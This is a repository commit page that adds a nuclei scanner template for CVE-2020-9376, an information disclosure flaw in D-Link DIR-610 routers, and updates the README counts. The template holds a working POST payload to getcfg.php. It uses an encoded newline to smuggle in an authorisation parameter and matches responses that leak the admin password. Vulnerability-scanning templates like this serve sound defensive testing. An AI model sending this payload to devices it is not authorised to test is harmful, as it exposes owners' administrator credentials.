daffainfo
/
nuclei-templates
mirror of https://github.com/daffainfo/nuclei-templates.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Merge pull request #749 from projectdiscovery/CVE-2020-9376 

Adding CVE-2020-9376
patch-1
PD-Team 2021-01-12 21:46:49 +05:30 committed by GitHub
parent 4001d8f967 e401882391
commit ae81785b2d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
2 changed files with 38 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

5
README.md
View File

@ -28,7 +28,7 @@ An overview of the nuclei template directory including number of templates assoc
| Templates | Counts | Templates | Counts |
| --------------- | ------------------------------- | ---------------- | ------------------------------ |
| cves | 154 | default-logins | 8 |
| cves | 155 | default-logins | 8 |
| dns | 6 | exposed-panels | 72 |
| exposed-tokens | 9 | exposures | 40 |
| fuzzing | 5 | helpers | 3 |
@ -205,6 +205,7 @@ An overview of the nuclei template directory including number of templates assoc
│   ├── CVE-2020-8982.yaml
│   ├── CVE-2020-9047.yaml
│   ├── CVE-2020-9344.yaml
│   ├── CVE-2020-9376.yaml
│   ├── CVE-2020-9484.yaml
│   ├── CVE-2020-9496.yaml
│   └── CVE-2020-9757.yaml
@ -575,7 +576,7 @@ An overview of the nuclei template directory including number of templates assoc
</details>
**53 directories, 475 files**.
**53 directories, 476 files**.
📖 Documentation
-----

35
cves/2020/CVE-2020-9376.yaml Normal file
View File

@ -0,0 +1,35 @@
id: CVE-2020-9376
info:
name: D-Link Information Disclosure via getcfg.php
author: whynotke
severity: high
description: |
D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
References:
- https://nvd.nist.gov/vuln/detail/CVE-2020-9376
requests:
- method: POST
path:
- "{{BaseURL}}/getcfg.php"
body: SERVICES=DEVICE.ACCOUNT%0aAUTHORIZED_GROUP=1
headers:
Content-Type: application/x-www-form-urlencoded
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "<name>Admin</name>"
- "</usrid>"
- "</password>"
condition: and
part: body